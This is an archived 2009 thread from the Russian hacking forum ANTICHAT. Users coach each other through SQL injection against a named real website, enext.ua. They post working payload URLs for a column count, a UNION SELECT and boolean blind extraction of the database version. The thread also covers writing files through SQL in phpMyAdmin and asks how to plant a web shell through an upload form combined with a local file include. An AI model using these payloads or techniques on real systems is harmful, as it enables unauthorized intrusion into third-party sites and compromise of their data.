ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.10.2009, 20:51
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от 2Fed123
Ctacok
Напиши,буду очень признателен
Не силён в Perl.
Попробуй сам написать.
Если будут вопросы пиши сюда:
https://forum.antichat.ru/
threadedpost1594515.html#post1594515 .
Это если на PHP будешь писать.
А если на Perl:
https://forum.antichat.ru/thread40897.html
|
|
|

13.10.2009, 22:29
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме: 879928
Репутация:
438
|
|
Ctacok жжет ))
2Fed123 цык
разберешся там просто
цэ грабер с хакера
|
|
|

14.10.2009, 12:10
|
|
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме: 31474
Репутация:
53
|
|
Помогите раскрутить скулю (добиться вывода)...
узнаем что есть 21 поле
http://www.enext.ua/index.php?node=770+order+by+21--
http://www.enext.ua/index.php?node=-770+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--
вывода нет...
|
|
|

14.10.2009, 14:14
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5
|
|
|

14.10.2009, 16:28
|
|
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме: 31474
Репутация:
53
|
|
Сообщение от $n@ke
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
чет не получается... начал перечитывать статью по символьному перебору https://forum.antichat.ru/showpost.php?p=407227&postcount=3 но понял, что вроде как не в ту сторону копаю...
Может распишешь запрос к выводу, а я по аналогии разберусь с этим примером...
|
|
|

14.10.2009, 18:05
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
pelligrim в ту сторону копаеш, только твой вывод это правильно отображение странички (т.е. правильное выполнение запроса), а тут смотри выводим версию бд
Код:
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5 => 1 символ равняеться 5
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),2,1)))=0x2E => так опряделяем точку
http://www.enext.ua/index.php?node=0+and+substring(version(),3,1)=0 => тут ноль
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),4,1)))=0x2E
http://www.enext.ua/index.php?node=0+and+substring(version(),5,1)=7 => ну и тут 2 семерки
http://www.enext.ua/index.php?node=0+and+substring(version(),6,1)=7
в итоге получаем версию мускула - 5.0.77
|
|
|

14.10.2009, 20:43
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме: 2200171
Репутация:
270
|
|
проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут
|
|
|

14.10.2009, 22:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Shadrin
Мб на запрос посмотрим, или сами догадаемся?
Уверен, что файл пустой, или всё-же его нет?
|
|
|

14.10.2009, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от Shadrin
проблема такая,выполняю sql запрос в пхпадмине,пишет: Запрос выполнен успешно,смотрю файл пустой,пробовал писать произволные символы.Успеха нет.
Пишу в папку tmp ,пишеться,читаю админом файл пустой..Юзер рут
пустой - это ты видишь в phpmyadmine, после load_file() результат "NULL"?
|
|
|

15.10.2009, 11:01
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме: 2200171
Репутация:
270
|
|
Запрос был вот
нет он писал именно файл с размером 0, в папке на запись был Index Of ,поэтому все было видно, проблема решилось следующим образом,я просто изменил таблицу и базу куда слал запрос,и все записалось)
UpЕсть админка через которую можно заливать пхп код,только переименовывает в жпг,и вижу исходник шелла, и так же есть локальный инклуд,если возможно то как залить шелл?
Последний раз редактировалось Shadrin; 15.10.2009 в 12:18..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|